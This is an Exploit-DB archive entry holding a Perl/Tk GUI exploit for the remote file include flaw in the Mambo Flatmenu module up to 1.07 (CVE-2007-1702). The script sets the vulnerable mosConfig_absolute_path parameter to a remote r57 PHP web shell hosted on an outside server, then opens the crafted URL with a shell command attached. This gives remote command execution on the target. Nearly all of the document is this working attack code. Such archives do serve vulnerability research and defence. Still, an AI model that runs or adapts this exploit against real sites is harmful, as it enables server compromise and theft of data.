Mambo Module Flatmenu <= 1.07 - Remote File Include Exploit

2007-03-25T00:00:00
ID EDB-ID:3567
Type exploitdb
Reporter Cold Zero
Modified 2007-03-25T00:00:00

Description

Mambo Module Flatmenu <= 1.07 Remote File Include Exploit. CVE-2007-1702. Webapps exploit for php platform

                                        
                                            #!/usr/bin/perl

#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#+
#-   - - [The Best Arab Security And Hacking Team] - -
#+
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#+
#- Mambo 4.5.1 Modules Flatmenu &lt;= 1.07 Remote File Include Exploit
#+
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#+
#- [Script name: Flatmenu 1.07 for Mambo 4.5.1
#- [Script site: http://mamboxchange.com/frs/download.php/2376/Flatmenu10b07_451_1.zip
#+
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#+
#-            Coded And Found By Coldz3ro
#-           Cold-z3ro[at]hotmail[dot]com
#-                 Ilove You HanaH
#+      Big thanks For You My Love Greeneyes_Amor
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

use Tk;
use Tk::DialogBox;
use LWP::UserAgent;

$mw = new MainWindow(title =&gt; "Team Hell Crew :: Mambo 4.5.1 Modules Flatmenu &lt;= 1.07 Remote File Include Exploit :: by Cold z3ro ;-)  " );
$mw-&gt;geometry ( '500x300' ) ;
$mw-&gt;resizable(0,0);

$mw-&gt;Label(-text =&gt; 'Mambo 4.5.1 Modules Flatmenu &lt;= 1.07 Remote File 
Include Exploit', -font =&gt; '{Verdana} 7 bold',-foreground=&gt;'blue')-&gt;pack();
$mw-&gt;Label(-text =&gt; '')-&gt;pack();

$fleft=$mw-&gt;Frame()-&gt;pack ( -side =&gt; 'left', -anchor =&gt; 'ne') ;
$fright=$mw-&gt;Frame()-&gt;pack ( -side =&gt; 'left', -anchor =&gt; 'nw') ;

$url = 'http://www.site.com/[Mambo_path]/modules/mod_flatmenu.php?mosConfig_absolute_path=';
$shell_path = 'http://nachrichtenmann.de/r57.txt?';
$cmd = 'ls -la';


$fleft-&gt;Label ( -text =&gt; 'Script Path: ', -font =&gt; '{Verdana} 8 bold') -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'e' ) ;
$fright-&gt;Entry ( -relief =&gt; "groove", -width =&gt; 35, -font =&gt; '{Verdana} 8', -textvariable =&gt; \$url) -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'w' ) ;

$fleft-&gt;Label ( -text =&gt; 'Shell Path: ', -font =&gt; '{Verdana} 8 bold' ) -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'e' ) ;
$fright-&gt;Entry ( -relief =&gt; "groove", -width =&gt; 35, -font =&gt; '{Verdana} 8', -textvariable =&gt; \$shell_path) -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'w' ) ;

$fleft-&gt;Label ( -text =&gt; 'CMD: ', -font =&gt; '{Verdana} 8 bold') -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'e' ) ;
$fright-&gt;Entry ( -relief =&gt; "groove", -width =&gt; 35, -font =&gt; '{Verdana} 8', -textvariable =&gt; \$cmd) -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'w' ) ;

$fright-&gt;Label( -text =&gt; ' ')-&gt;pack();
$fleft-&gt;Label( -text =&gt; ' ')-&gt;pack();



$fright-&gt;Button(-text    =&gt; 'Exploit Include Vulnerability',
               -relief =&gt; "groove",
               -width =&gt; '30',
               -font =&gt; '{Verdana} 8 bold',
               -activeforeground =&gt; 'red',
               -command =&gt; \&akcja
              )-&gt;pack();


$fright-&gt;Label( -text =&gt; ' ')-&gt;pack();
$fright-&gt;Label( -text =&gt; 'Exploit Coded By Cold z3ro [Wasem898]', -font =&gt; '{Verdana} 7')-&gt;pack();
$fright-&gt;Label( -text =&gt; 'Team Hell Crew :: The Best Arab Security And Hacking Team', -font =&gt; '{Verdana} 7')-&gt;pack();
$fright-&gt;Label( -text =&gt; 'Cold-z3ro@hotmail.com', -font =&gt; '{Verdana} 7')-&gt;pack();
$fright-&gt;Label( -text =&gt; ' Long Life My Home Land Palestine', -font =&gt; '{Verdana} 7')-&gt;pack();
$fright-&gt;Label( -text =&gt; ' ~~\Big thanks For You My Love Greeneyes_Amor/~~', -font =&gt; '{Verdana} 7')-&gt;pack();
MainLoop();

sub akcja()
{
$InfoWindow=$mw-&gt;DialogBox(-title   =&gt; 'Team Hell Crew :: Exploit by Cold 
z3ro ;-) ', -buttons =&gt; ["OK"]);
$InfoWindow-&gt;add('Label', -text =&gt; ' For help Cold-z3ro@hotmail.com #Team Hell', -font =&gt; '{Verdana} 8')-&gt;pack;
$InfoWindow-&gt;add('Label', -text =&gt; '', -font =&gt; '{Verdana} 8')-&gt;pack;
$InfoWindow-&gt;add('Label', -text =&gt; 'Team Hell Site: http://www.Hack-teach.com/', -font =&gt; '{Verdana} 8')-&gt;pack;
$InfoWindow-&gt;add('Label', -text =&gt; '', -font =&gt; '{Verdana} 8')-&gt;pack;
$InfoWindow-&gt;add('Label', -text =&gt; '', -font =&gt; '{Verdana} 8')-&gt;pack;
$InfoWindow-&gt;add('Label', -text =&gt; 'Greetz For my friends ;-)', -font =&gt; '{Verdana} 8')-&gt;pack;
$InfoWindow-&gt;add('Label', -text =&gt; '', -font =&gt; '{Verdana} 8')-&gt;pack;

system("start $url$shell_path$cmd");
$InfoWindow-&gt;Show();
}
# www.Hack-Teach.com , www.4azhar.com ]

# milw0rm.com [2007-03-25]